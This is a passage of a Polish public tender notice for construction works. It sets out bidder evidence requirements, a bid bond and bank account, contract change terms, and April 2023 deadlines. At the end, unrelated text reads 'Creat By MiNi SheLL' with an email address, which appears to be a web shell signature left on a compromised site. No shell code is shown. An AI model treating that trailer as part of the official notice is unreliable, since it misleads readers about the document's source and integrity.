uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie wykazują te dokumenty, jako obowiązujące. <br/> Zamawiający dopuszcza również możliwość uznania uprawnień wynikających z innych niż krajowe przepisów np. treści dyrektyw, zawartych umów międzynarodowych i innych przepisów, które potwierdzą spełnianie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia. <br/> Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2019r., poz. 1186) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021r. poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu obowiązany jest złożyć wraz z ofertą oświadczenie o braku podstaw do wykluczenia z postępowania na podstawie art. 108 ust. 1 ustawy Pzp, i art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 1składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/> Wzory oświadczeń stanowią załączniki nr 2 i 2a do SWZ. <br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/> a) złożyć wykaz robót budowlanych określonych rodzajowo w punkcie 8.4.a) <br/> SWZ, wykonanych nie wcześniej niż w okresie ostatnich pięciu lat, a jeżeli okres <br/> prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich:<br/> - rodzaju, - wartości, - daty i miejsca wykonania, - podmiotów, na rzecz <br/> których roboty te zostały wykonane; oraz załączyć dowody określające, czy <br/> te roboty zostały wykonane należycie.<br/> Dowodami, o których mowa powyżej są: - referencje, - inne dokumenty <br/> sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, <br/> a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać <br/> tych dokumentów – inne odpowiednie dokumenty.<br/> Wzór wykazu – załącznik nr 3 do SWZ.<br/> b) złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia <br/> publicznego, w szczególności odpowiedzialnych za kierowanie robotami <br/> budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, <br/> uprawnień, niezbędnych do wykonania zamówienia, a także zakresu <br/> wykonywanych przez nie czynności, oraz podać informację o podstawie <br/> dysponowania osobami ujętymi w wykazie.<br/> Wzór wykazu – załącznik nr 4 do SWZ.<br/> c) złożyć polisę lub dokument potwierdzający, że Wykonawca jest ubezpieczony <br/> od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z <br/> przedmiotem zamówienia na sumę nie mniejszą niż 100 000,00 PLN. <br/> d) zaświadczenie właściwego naczelnika urzędu skarbowego, <br/> potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w <br/> zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 <br/> miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem <br/> podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia <br/> dokumentów potwierdzających, że odpowiednio przed upływem terminu <br/> składania wniosków o dopuszczenie do udziału w postępowaniu albo przed <br/> upływem terminu składania ofert wykonawca dokonał płatności należnych <br/> podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące <br/> porozumienie w sprawie spłat tych należności; <br/> e) zaświadczenia albo innego dokumentu właściwej terenowej jednostki <br/> organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału <br/> regionalnego lub właściwej placówki terenowej Kasy Rolniczego <br/> Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z <br/> opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. <br/> 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego <br/> złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia <br/> społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem <br/> zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio <br/> przed upływem terminu składania wniosków o dopuszczenie do udziału w <br/> postępowaniu albo przed upływem terminu składania ofert wykonawca <br/> dokonał płatności należnych składek na ubezpieczenia społeczne lub <br/> zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w <br/> sprawie spłat tych należności; <br/> f) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej <br/> Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 <br/> pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, <br/> jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/> g) oświadczenie o przynależności lub braku przynależności do tej samej grupy <br/> kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie <br/> konkurencji i konsumentów zgodnie z art. 108ust.1 pkt 6 ustawy Pzp.<br/> Wzór wykazu – załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy - zgodnie z załącznikiem nr 1 do SWZ<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w pkt 9 SWZ,<br/>2) dokumenty, z których wynika prawo do podpisania oferty, odpowiednie pełnomocnictwo (jeżeli dotyczy),<br/>3) dowód wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca obowiązany jest wnieść wadium w wysokości: 4 000,00zł (słownie: cztery tysiące złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/> 1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 <br/> pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/> Przedsiębiorczości (t.j. Dz. U. z 2022r. poz. 2080).<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/> Zamawiającego w banku PKO Bank Polski Oddział w Rzeszowie na nr <br/> 43102043910000690201995968. <br/>6. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca <br/>przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8. Zasady zwrotu oraz okoliczności zatrzymania wadium określono w art. 98 ustawy oraz pkt 17 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3. W przypadku dokonania wyboru oferty wykonawcy występującego wspólnie, przed przystąpieniem do zawarcia umowy o zamówienie publiczne, przedłożona zostanie umowa regulującą współpracę wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia. <br/>4. Za wykonawców wspólnie ubiegających się o udzielenie zamówienia uważa się również wszystkich wspólników spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>2. Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p oraz wskazanym we wzorze umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Formularz do złożenia oferty dostępny jest na Platformie e-Zamówienia w zakładce postępowania- informacje podstawowe</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wyjaśnienie treści Specyfikacji Warunków Zamówienia:<br/>1. Wykonawca może zwrócić się do zamawiającego z prośbą - wnioskiem o wyjaśnienie treści specyfikacji warunków zamówienia. Zamawiający udzieli wyjaśnień niezwłocznie, nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek o wyjaśnienie SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert.<br/>2. Jeżeli zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w pkt 13.1. przedłuża termin składania odpowiednio ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia odpowiednio ofert. <br/>3. W przypadku gdy wniosek o wyjaśnienie treści SWZ albo opisu potrzeb i wymagań nie wpłynął w terminie, o którym mowa w pkt 13.1. zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert.<br/>4. Przedłużenie terminu składania ofert, o których mowa w pkt 13.3. nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści odpowiednio SWZ albo opisu potrzeb i wymagań.<br/>5. Treść zapytań wraz z wyjaśnieniami zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej prowadzonego postępowania.<br/>6. W uzasadnionych przypadkach zamawiający może przed upływem terminu składania ofert zmienić treść specyfikacji warunków zamówienia. Dokonaną zmianę treści specyfikacji zamawiający udostępnia na stronie internetowej prowadzonego postępowania. <br/>7. W przypadku gdy zmiana treści SWZ prowadzi do zmiany treści ogłoszenia o <br/>zamówieniu, Zamawiający zamieszcza w Biuletynie Zamówień Publicznych ogłoszenie o zmianie ogłoszenia na stronie internetowej prowadzonego postępowania.<br/>8. Zamawiający nie przewiduje zwołania zebrania wykonawców w celu wyjaśnienia treści SWZ. <br/>9. Osobą do kontaktu i porozumiewania się z wykonawcami jest:<br/> - w zakresie przedmiotu zamówienia – Bogumiła Brzostek; tel.13 43 540 80<br/> - w zakresie procedury przetargowej – Bogusława Gargasz; tel.13 43 540 80<br/>10. Zamawiający nie przewiduje przeprowadzenia wizji lokalnej w terenie.

Creat By MiNi SheLL
Email: jattceo@gmail.com